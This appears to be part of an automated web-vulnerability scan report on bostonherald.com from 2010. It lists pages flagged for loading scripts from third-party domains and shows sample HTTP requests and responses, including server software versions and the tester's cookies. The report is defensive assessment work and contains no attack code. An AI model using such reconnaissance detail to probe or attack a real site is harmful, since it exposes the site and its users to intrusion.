<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Ftrack%2Fstar_tracks%2Fview.bg%3Farticleid%3D1294606%26srvc%3Dhome%26position%3Dalso&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/></a>
...[SNIP]...

9. Cross-domain script include previous next
There are 199 instances of this issue:

/
/about/electronic_edition/
/about/home_delivery/
/blogs/
/blogs/entertainment/
/blogs/entertainment/the_assistant/
/blogs/lifestyle/
/blogs/lifestyle/fork_lift/
/blogs/news/
/blogs/news/city_desk_wired/
/blogs/sports/
/business/
/business/automotive/
/business/automotive/view/20101105chevy_volt_fact_vs_fiction/srvc=home&position=also
/business/automotive/view/20101105value_of_gms_new_stock_difficult_to_pin_down/srvc=home&position=also
/business/automotive/view/20101106lincoln_goes_green_with_mkz_hybrid_2011_luxury_sedan_gets_41_mpg_in_city_driving/srvc=home&position=also
/business/automotive/view/20101107blinking_jetta_hates_her_husband/format=comments&srvc=home&position=also
/business/automotive/view/20101107blinking_jetta_hates_her_husband/srvc=home&position=also
/business/general/
/business/general/view.bg
/business/general/view/20101107ads_fueled_victory_of_question_1/srvc=home&position=also
/business/general/view/20101107bruins_cap_season_ticket_sales_more_single-game_seats_as_attendance_up_12/format=comments&srvc=home&position=also
/business/general/view/20101107bruins_cap_season_ticket_sales_more_single-game_seats_as_attendance_up_12/srvc=home&position=also
/business/healthcare/
/business/healthcare/view/20101107regulation_hurts_medical_supplier/format=comments&srvc=home&position=5
/business/healthcare/view/20101107regulation_hurts_medical_supplier/srvc=home&position=5
/business/media/
/business/media/view/20101107megamind_has_mega_debut_with_477m/srvc=home&position=also
/business/media/view/20101107olbermann_suspension_highlights_ethics_rules/srvc=home&position=also
/business/real_estate/
/business/real_estate/view/20101106jp_starter_condo_has_charm/srvc=home&position=also
/business/real_estate/view/20101106mansion_to_be_auctioned_site_once_owned_by_infamous_tyco_exec/srvc=home&position=also
/business/real_estate/view/20101107critics_hit_feds_appraisal_rules/format=comments&srvc=home&position=also
/business/real_estate/view/20101107critics_hit_feds_appraisal_rules/srvc=home&position=also
/business/real_estate/view/20101107homeowners_say_loan_mods_led_them_to_foreclosure/srvc=home&position=also
/business/technology/
/business/womens/
/crossword/
/entertainment/
/entertainment/arts_culture/
/entertainment/arts_culture/view.bg
/entertainment/books/
/entertainment/contests/
/entertainment/fashion/
/entertainment/food_dining/
/entertainment/health/
/entertainment/horoscope/
/entertainment/lifestyle/
/entertainment/movies/
/entertainment/movies/dvd/view/20101107grown_ups/srvc=home&position=also
/entertainment/music/
/entertainment/music/general/view/20101107guided_tour_sates_hard-core_fans/srvc=home&position=also
/entertainment/television/
/entertainment/television/general/view/20101107dead_center_actor_lincoln_living_the_zombie_dream_on_amc_drama/srvc=home&position=7
/entertainment/television/general/view/20101107state_of_the_event_as_president_blair_underwood_stumps_for_nbc_drama/srvc=home&position=also
/entertainment/television/general/view/20101107watch_this/srvc=home&position=also
/entertainment/travel/
/extras/
/homepage.bg
/includes/PointRollAds.htm
/index.bg
/intra/hashtag/
/jobfind/
/jobfind/news/healthcare/view/20101107maine_pine_needles_yield_valuable_tamiflu_material/srvc=home&position=also
/jobfind/news/media/view/20101105nbc_suspends_keith_olbermann_for_political_donations/srvc=home&position=also
/jobfind/news/media/view/20101107megamind_has_mega_debut_with_477m/srvc=home&position=also
/jobfind/news/media/view/20101107olbermann_suspension_highlights_ethics_rules/format=comments&srvc=home&position=also
/jobfind/news/media/view/20101107olbermann_suspension_highlights_ethics_rules/srvc=home&position=also
/lottery/
/mediacenter/
/mediacenter/index.php
/mediacenter/index.php
/mediacenter/video.php
/mediacenter/video.php
/news/
/news/columnists/
/news/columnists/view.bg
/news/columnists/view/20101105danny_woodheads_tops_on_the_short_list_of_gridiron_hunks/srvc=news&position=also
/news/columnists/view/20101105friend_advises_chuck_turner_keep_your_mouth_shut/srvc=news&position=also
/news/columnists/view/20101105kujo_its_about_time_your_luck_ran_out/srvc=news&position=also
/news/columnists/view/20101107gops_blue-chippers_emerge_amid_losses/
/news/columnists/view/20101107gops_blue-chippers_emerge_amid_losses/format=comments&srvc=home&position=also
/news/columnists/view/20101107gops_blue-chippers_emerge_amid_losses/srvc=home&position=also
/news/columnists/view/20101107puerto_rican_vets_seek_honor/format=comments&srvc=news&position=also
/news/columnists/view/20101107puerto_rican_vets_seek_honor/srvc=news&position=also
/news/columnists/view/20101107shaunna_oconnell_used_state_reps_own_words_in_defeating_him_justice_prevails_1/
/news/columnists/view/20101107shaunna_oconnell_used_state_reps_own_words_in_defeating_him_justice_prevails_1/srvc=home&position=also
/news/document.bg
/news/international/
/news/international/americas/view/2010110720_killed_over_weekend_in_mexican_border_city/format=comments&srvc=news&position=also
/news/international/americas/view/2010110720_killed_over_weekend_in_mexican_border_city/srvc=news&position=also
/news/international/americas/view/2010110720_killed_over_weekend_in_mexican_border_city/srvc=news&position=recent_bullet
/news/international/asia_pacific/view/201011072_us_drone_strikes_kill_9_militants_in_nw_pakistan/srvc=news&position=also
/news/international/asia_pacific/view/20101107indonesian_volcano_sparks_travel_chaos/srvc=news&position=also
/news/international/europe/view.bg
/news/international/europe/view/20101107police_arrest_man_in_swedish_immigrant_shootings/srvc=home&position=recent
/news/international/europe/view/20101107police_arrest_man_in_swedish_immigrant_shootings/srvc=news&position=also
/news/international/europe/view/20101107the_socialite_network_uks_queen_joins_facebook/srvc=news&position=recent_bullet
/news/national/
/news/national/general/view/20101106blacks_struggle_with_72_percent_unwed_mothers_rate/srvc=news&position=also
/news/national/northeast/view/20101107first_gay_episcopal_bishop_to_retire_in_2013/srvc=news&position=also
/news/national/northeast/view/20101107jury_in_connecticut_home_invasion_case_back_for_3rd_day/format=comments&srvc=news&position=also
/news/national/northeast/view/20101107jury_in_connecticut_home_invasion_case_back_for_3rd_day/srvc=news&position=also
/news/national/southwest/view/20101107oklahoma_council_takes_no_stand_on_sharia_law_proposal/srvc=news&position=also
/news/obituaries/
/news/offbeat/
/news/offbeat/view/20101103man_in_breathalyzer_costume_cited_for_dui/srvc=news&position=also
/news/offbeat/view/20101106costly_collecting_habit_nuns_score_with_262g_baseball_card/srvc=news&position=also
/news/offbeat/view/20101106stripper_pole_among_items_stolen_from_adult_bookstore/srvc=news&position=also
/news/offbeat/view/20101107dont_worry_mother_im_coming_to_save_you/format=comments&srvc=news&position=also
/news/offbeat/view/20101107dont_worry_mother_im_coming_to_save_you/srvc=news&position=also
/news/opinion/
/news/opinion/editorials/view.bg
/news/opinion/editorials/view/20101107knee-jerk_reaction/srvc=news&position=also
/news/opinion/op_ed/view/20101107after_midterms_all_is_right/srvc=news&position=also
/news/opinion/op_ed/view/20101107dems_find_way_to_ignore_voters_will/format=comments&srvc=news&position=also
/news/opinion/op_ed/view/20101107dems_find_way_to_ignore_voters_will/srvc=news&position=also
/news/opinion/op_ed/view/20101107gop_wave_misses_liberal_enclaves/srvc=news&position=also
/news/police_logs/
/news/police_logs/view/20101027dont_rock_the_boat_or_break_into_it_either/srvc=news&position=also
/news/police_logs/view/20101028david_ortiz_goes_to_bat_to_combat_hub_violence/srvc=news&position=also
/news/police_logs/view/20101104too_much_candy_at_this_party/srvc=news&position=also
/news/police_logs/view/20101105caught_green_handed/format=comments&srvc=news&position=also
/news/police_logs/view/20101105caught_green_handed/srvc=news&position=also
/news/politics/
/news/politics/view.bg
/news/politics/view/20101106pol_calls_for_ouster_of_states_gop_leader/srvc=news&position=also
/news/politics/view/20101106towns_high_and_dry_on_boat_taxes_experts_excise_laws_favor_john_kerry_other_bay_state_owners/srvc=news&position=also
/news/politics/view/20101107mass_voters_back_loosening_of_marijuana_laws/srvc=news&position=also
/news/politics/view/20101107moneybags_menino/format=comments&srvc=news&position=also
/news/politics/view/20101107moneybags_menino/srvc=news&position=also
/news/politics/view/20101107tim_cahill_attacks_backfired_independent_slams_republican_strategy/format=comments&srvc=home&position=1
/news/politics/view/20101107tim_cahill_attacks_backfired_independent_slams_republican_strategy/srvc=home&position=1
/news/regional/
/news/regional/view.bg
/news/regional/view/20101107big_homecoming_planned_for_nh_girl_who_lost_limbs/srvc=news&position=also
/news/regional/view/20101107bridge_work_hits_ducks_dinosaurs/srvc=news&position=also
/news/regional/view/20101107church-sale_plan_causes_beef/format=comments&srvc=home&position=3
/news/regional/view/20101107church-sale_plan_causes_beef/srvc=home&position=3
/news/regional/view/20101107moving_day_for_hope_homeowners/srvc=home&position=also
/news/regional/view/20101107moving_day_for_hope_homeowners/srvc=news&position=also
/news/regional/view/20101107real-life_wedding_crasher_limo_bandit_takes_something_borrowed_to_new_level/format=comments&srvc=home&position=2
/news/regional/view/20101107real-life_wedding_crasher_limo_bandit_takes_something_borrowed_to_new_level/srvc=home&position=2
/news/regional/view/20101107teen_mom_due_in_court_for_allegedly_tossing_infant/format=comments&srvc=news&position=also
/news/regional/view/20101107teen_mom_due_in_court_for_allegedly_tossing_infant/srvc=home&position=also
/news/regional/view/20101107teen_mom_due_in_court_for_allegedly_tossing_infant/srvc=news&position=also
/news/us_politics/
/news/us_politics/view/20101106despite_the_shellacking_president_obama_keeping_his_team_intact/srvc=news&position=also
/news/us_politics/view/20101107eric_cantor_if_nancy_pelosi__stays_then_dems_dont_get_it/srvc=news&position=also
/news/us_politics/view/20101107georgia_details_nuclear_smuggling/srvc=news&position=also
/news/us_politics/view/20101107obama_says_midcourse_corrections_to_come_at_home/srvc=news&position=also
/news/us_politics/view/20101107obama_says_midcourse_corrections_to_come_at_home/srvc=news&position=recent_bullet
/photobox/index.bg
/projects/your_tax_dollars.bg
/search/
/shopping/half_price_boston/
/sports/
/sports/baseball/
/sports/baseball/red_sox/view.bg
/sports/baseball/red_sox/view/20101107adrian_gonzalez_fit_for_red_sox_eventually/srvc=home&position=also
/sports/basketball/
/sports/college/
/sports/columnists/
/sports/columnists/view.bg
/sports/columnists/view/20101107crushing_hit_on_david_krejci_puts_loss_in_perspective/srvc=home&position=also
/sports/football/
/sports/football/other_nfl/view/20101107giants_overpower_seahawks_41-7/srvc=home&position=recent
/sports/football/other_nfl/view/20101107sanchez-led_jets_rally_to_beat_lions_23-20_in_ot/srvc=home&position=also
/sports/football/patriots/view.bg
/sports/football/patriots/view/20101107browns_overpower_patriots_34-14/format=comments&srvc=home&position=0
/sports/football/patriots/view/20101107browns_overpower_patriots_34-14/srvc=home&position=0
/sports/football/patriots/view/20101107gil_brandt_likes_patriots_dirty_dozen_redux/format=comments&srvc=home&position=also
/sports/football/patriots/view/20101107gil_brandt_likes_patriots_dirty_dozen_redux/srvc=home&position=also
/sports/football/patriots/view/20101107just_as_he_drew_it_up_bledsoes_post-career_planning_a_big_success_thanks_to_family_and_businesses_worth_toasting/format=comments&srvc=home&position=4
/sports/football/patriots/view/20101107just_as_he_drew_it_up_bledsoes_post-career_planning_a_big_success_thanks_to_family_and_businesses_worth_toasting/srvc=home&position=4
/sports/golf/
/sports/high_school/
/sports/hockey/
/sports/other_sports/
/sports/soccer/
/store/
/track/
/track/celebrity/
/track/inside_track/
/track/inside_track/view.bg
/track/inside_track/view/20101107cake_boss_is_a_jersey_boy_at_heart/srvc=home&position=also
/track/inside_track/view/20101107rick_fox_sees_celtics_as_cream_team/format=comments&srvc=home&position=also
/track/inside_track/view/20101107rick_fox_sees_celtics_as_cream_team/srvc=home&position=also
/track/inside_track/view/20101107tracked_down_scott_listfield_terry_francona_joey_fatone__more/srvc=home&position=also
/track/inside_track/view/20101107we_hearernie_boch_jr_sean_duffy__more/srvc=home&position=also
/track/star_tracks/
/track/star_tracks/view.bg
/track/star_tracks/view/20101107ben_affleck_returns_unearned_spoils/format=comments&srvc=home&position=6
/track/star_tracks/view/20101107ben_affleck_returns_unearned_spoils/srvc=home&position=6
/track/track_gals_tv/
/users/login
/users/register
/users/register/
/weather/

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.

9.1. http://bostonherald.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/carousel.js
http://cache.heraldinteractive.com/js/common.js?nocache=123
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js
http://hosted.ap.org/dynamic/proxy-partial-js/ibd.morningstar.com/AP/MarketIndexGraph.html?CN=AP707&gf=3&idx=2&SITE=MABOH&SECTION=DJSP_COMPLETE
http://q1digital.checkm8.com/adam/cm8adam_1_call.js
http://scores.heraldinteractive.com/aspdata/clients/herald/game.aspx?team=028
http://scores.heraldinteractive.com/aspdata/clients/herald/nbagame.aspx?team=092
http://scores.heraldinteractive.com/aspdata/clients/herald/nflgame.aspx?team=077
http://scores.heraldinteractive.com/aspdata/clients/herald/nhlgame.aspx?team=121

Request

GET / HTTP/1.1
Host: bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/news/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bhfont=12; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC; OAX=rnoX2kzXQXwACWRq; bhpopup=on; __utmz=235728274.1289175424.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1292731211-1289175424376; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.14.10.1289175424; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.4.10.1289175481; RMFD=011PFFPzO101yed8|O1021J6R

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 00:22:56 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 153474

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js?nocache=123" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<div id="containerSliderInner">
<script src="http://cache.heraldinteractive.com/js/carousel.js" type="text/javascript"></script>
...[SNIP]...
<div>
<script type="text/javascript" language="Javascript" src="http://scores.heraldinteractive.com/aspdata/clients/herald/game.aspx?team=028"></script>
...[SNIP]...
<div>
<script type="text/javascript" language="Javascript" src="http://scores.heraldinteractive.com/aspdata/clients/herald/nflgame.aspx?team=077"></script>
...[SNIP]...
<div>
<script type="text/javascript" language="Javascript" src="http://scores.heraldinteractive.com/aspdata/clients/herald/nbagame.aspx?team=092"></script>
...[SNIP]...
<div>
<script type="text/javascript" language="Javascript" src="http://scores.heraldinteractive.com/aspdata/clients/herald/nhlgame.aspx?team=121"></script>
...[SNIP]...
<div id="busTabsHp" style="width:180px; margin:0 auto;">
<script language="javascript" src="http://hosted.ap.org/dynamic/proxy-partial-js/ibd.morningstar.com/AP/MarketIndexGraph.html?CN=AP707&gf=3&idx=2&SITE=MABOH&SECTION=DJSP_COMPLETE"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script>
<SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT>
...[SNIP]...

9.2. http://bostonherald.com/about/electronic_edition/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/about/electronic_edition/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://cache.heraldinteractive.com/js/ajax.js?nc=1
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js

Request

GET /about/electronic_edition/ HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 09:38:57 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 25472

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js?nc=1" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.3. http://bostonherald.com/about/home_delivery/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/about/home_delivery/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://cache.heraldinteractive.com/js/ajax.js?nc=1
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /about/home_delivery/ HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 09:38:29 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 30937

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js?nc=1" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.4. http://bostonherald.com/blogs/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/blogs/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://q1digital.checkm8.com/adam/cm8adam_1_call.js

Request

GET /blogs/ HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 02:50:35 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 65583

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<!-- // section_beta.tmpl // --
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script>
<SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT>
...[SNIP]...

9.5. http://bostonherald.com/blogs/entertainment/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/blogs/entertainment/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js

Request

GET /blogs/entertainment/ HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 02:50:35 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
